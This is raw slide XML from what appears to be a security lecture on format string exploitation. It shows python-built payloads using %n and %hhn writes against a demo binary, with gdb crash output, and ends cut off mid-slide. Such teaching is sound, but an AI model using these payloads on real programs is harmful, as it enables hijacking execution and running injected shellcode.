                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>��BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80497d8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\xd8\x97\x04\x08BBBBCCCCDDDD" + "%2\$n"'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>��BBBBCCCCDDDD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>287</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62818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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\xd8\x97\x04\x08BBBBCCCCDDDD" + "%2\$n"'` &gt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r &lt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00000010 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            0x10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>288</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39107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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to control the value to write?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the man page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"The field width"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("%200x", 0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will pad the 0 with 200 space characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows us to control the number of characters that are output!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the number that we want to write?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, say at 0xffffcaf5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>4,294,953,717 (4.2 GB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>289</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116351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0" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory access is composed of width, base, index, scale, and displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Base: starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index: offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scale: Constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displacement: Constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Width: (address suffix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>size of reference (b: byte, s: short, w: word, l: long, q: quad)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address = base + index*scale + displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>displacement(base, index, scale)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x20(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 4), %</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73693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06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06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06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106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106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106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1069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1069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1069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10691">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1069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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of writing 0xffffcaf5 all in one go, let's write 0xff 0xff 0xca 0xf5 separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the man page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will act as a "signed char" and only write one byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We've already output 16 (0x10) bytes, so to get to 0xff we need (0xff – 0x10 = 0xef = 239)</a:t>
            </a:r>
          </a:p>
          <a:p>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290</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39168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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\xd8\x97\x04\x08BBBBCCCCDDDD" + "%239x%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...  run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGILL, Illegal instruction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x080483</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> in _start ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08BBBBCCCCDDDD" + "%239x%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xff0483a2 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08CCCCDDDD" + "%239x%2\$hhn%3\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
